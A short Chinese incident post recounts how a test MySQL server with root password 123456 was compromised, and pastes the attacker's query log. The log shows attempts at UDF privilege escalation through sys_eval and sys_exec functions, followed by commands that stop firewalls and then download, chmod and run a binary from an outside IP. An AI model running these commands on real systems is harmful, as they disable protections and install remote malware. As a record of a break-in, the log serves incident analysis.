一个测试库,由于之前部署的时候没注意它有公网地址,因此密码也设得比较简单,直接把root密码设为123456,没想到很快就被扫描后登进去了,还建了一个用户,试图利用mysql udf取得机器系统权限。如下:
108883 Connect root@222.186.30.126on
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME'mysqludf.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME'mysqludf64.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME'lib_mysqludf.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME'udf.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME'xiaoji64.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME'xiaoji.so'
108883 Query CREATE FUNCTION sys_eval RETURNS string SONAME'liunx32.so'
108883 Query CREATE FUNCTION sys_evalRETURNS string SONAME 'liunx64.so'
108883 Query create function sys_eval returns string soname"lib_mysqludf_sys.so"
108883 Query CREATE FUNCTION mylab_sys_exec RETURNS INTEGERSONAME "mylab_sys_exec.so"
108883 Query system wget http://106.122.249.81:222/Client32
108883 Query system chmod +x Client32
108883 Query system chmod 777 Client32
system ./Client32
108883 Query select sys_eval("/etc/init.d/iptablesstop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget-c
http://106.122.249.81:222/Client32;chmod777 Client32;./Client32;")
108883 Query SELECT mylab_sys_exec(/etc/init.d/iptables stop
108883 Query service iptables stop
108883 Query SuSEfirewall2 stop
108883 Query reSuSEfirewall2 stop
108883 Query wget-c http://106.122.249.81:222/Client32
151208 10:09:40108883 Query chmod 777 Client32
108883 Query ./Client32
108883 Query ");
关于UDF提权是咋回事,这里不细说了。
